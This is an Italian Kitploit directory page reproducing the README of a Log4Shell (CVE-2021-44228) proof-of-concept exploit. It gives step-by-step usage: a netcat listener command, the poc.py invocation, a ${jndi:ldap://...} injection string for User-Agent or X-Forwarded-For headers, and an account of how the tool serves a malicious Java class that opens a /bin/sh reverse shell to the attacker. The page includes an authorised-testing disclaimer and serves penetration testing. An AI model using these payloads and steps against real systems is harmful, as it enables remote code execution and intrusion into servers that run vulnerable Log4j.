Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-shell-poc — Una Proof-Of-Concept per la vulnerabilità CVE-2021-44228. | Kitploit
Strumenti/GitHubGitHub/jiahong-guan/log4j-shell-poc
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubjiahong-guan/log4j-shell-poc

log4j-shell-poc

Una Proof-Of-Concept per la vulnerabilità CVE-2021-44228.

Vedi Repository
110 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4shell-poc (CVE-2021-44228)

Exploit proof-of-concept per la vulnerabilità Log4j (CVE-2021-44228), nota anche come Log4Shell. Questo strumento genera una classe Java dannosa, avvia un server di riferimento LDAP e serve il payload su HTTP, consentendo a un attaccante remoto di eseguire comandi arbitrari su un target vulnerabile.

Caratteristiche

  • Rilevamento automatico dell'indirizzo IPv4 locale come IP di bind predefinito.
  • Supporto per JDK 1.8.0_20 incluso (consigliato) con fallback al Java di sistema.
  • Payload di reverse shell inline (si riconnette a un listener netcat).
  • Compilazione pulita e rimozione dei file generati.

Requisiti

  • Python 3.6 o superiore
  • I seguenti file/directory devono trovarsi nella stessa cartella di poc.py:
    • jdk1.8.0_20/ – una copia di Oracle JDK 1.8.0_20 (contiene bin/javac e bin/java). Se manca, lo script tenterà di usare i comandi javac e java di sistema.
    • target/marshalsec-0.0.3-SNAPSHOT-all.jar – il file JAR di marshalsec usato per avviare il server LDAP.

Installazione

  1. Clona o scarica questo repository.
  2. Posiziona la cartella jdk1.8.0_20 e il JAR di marshalsec come descritto sopra.
  3. Installa le dipendenze Python:
    root@kitploit:~
    pip install -r requirements.txt
    

Utilizzo

Esegui lo script con Python:

root@kitploit:~
python3 poc.py [OPZIONI]

Argomenti della riga di comando

Esempio

  1. Avvia un listener netcat sulla tua macchina attaccante (sostituisci 9001 con la porta scelta):

    root@kitploit:~
    nc -lvnp 9001
    
  2. Esegui l'exploit:

    root@kitploit:~
    python3 poc.py --userip 192.168.1.10 --webport 8080 --lport 9001
    

    Se ometti --userip, lo script userà automaticamente l'indirizzo IPv4 primario della tua macchina.

  3. Lo script mostrerà una stringa di payload da iniettare nel target vulnerabile, ad esempio:

    root@kitploit:~
    ${jndi:ldap://192.168.1.10:1389/a}
    
  4. Inietta questa stringa in qualsiasi campo di input o header HTTP che viene registrato da un'istanza Log4j vulnerabile (ad es. User-Agent, X-Forwarded-For, ecc.). Il target si connetterà al server LDAP, recupererà la classe dannosa dal server HTTP ed eseguirà la reverse shell.

  5. Dovresti vedere apparire una connessione shell nel tuo listener netcat.

Come funziona

  1. Lo script genera Exploit.java contenente codice che apre una reverse shell verso userip:lport.
  2. Compila il file usando il JDK fornito (o javac di sistema).
  3. Avvia un server LDAP (tramite marshalsec) che risponde alle ricerche JNDI con un riferimento al server HTTP.
  4. Avvia un semplice server HTTP sulla porta webport per ospitare il Exploit.class compilato.
  5. Quando un target vulnerabile effettua una ricerca JNDI con il payload iniettato, scarica ed esegue la classe, fornendo all'attaccante una reverse shell.

Note importanti

  • Il payload della reverse shell usa /bin/sh ed è pensato per sistemi target Unix-like. Per target Windows, dovresti modificare il comando all'interno di Exploit.java.
  • Il JDK 1.8.0_20 incluso è consigliato perché le versioni successive potrebbero bloccare la funzionalità di caricamento remoto delle classi JNDI usata da questo exploit.
  • Assicurati che i firewall consentano connessioni in ingresso sulle porte specificate (webport e lport) e che il target possa raggiungere la tua macchina.

Pulizia

Lo script rimuove automaticamente Exploit.java e Exploit.class all'uscita (sia normalmente che dopo un KeyboardInterrupt). Se devi conservare i file per il debug, commenta il blocco finally in poc.py.

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato di questo exploit contro sistemi che non possiedi o per i quali non hai un permesso esplicito di test è illegale. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo software.

Crediti

  • PoC originale di kozmer
  • Marshalsec di mbechler
  • Vulnerabilità Log4j scoperta dall'Alibaba Cloud Security Team
Scarica lo strumento
ArgomentoTipoPredefinitoDescrizione
--useripstringaIPv4 rilevato autoIndirizzo IP a cui i server LDAP e HTTP si legheranno e che pubblicizzeranno. Deve essere raggiungibile dalla macchina target.
--webportintero8000Porta per il server HTTP che serve il Exploit.class compilato.
--lportintero9001Porta su cui il tuo listener netcat attende la reverse shell. Il payload si riconnetterà a userip:lport.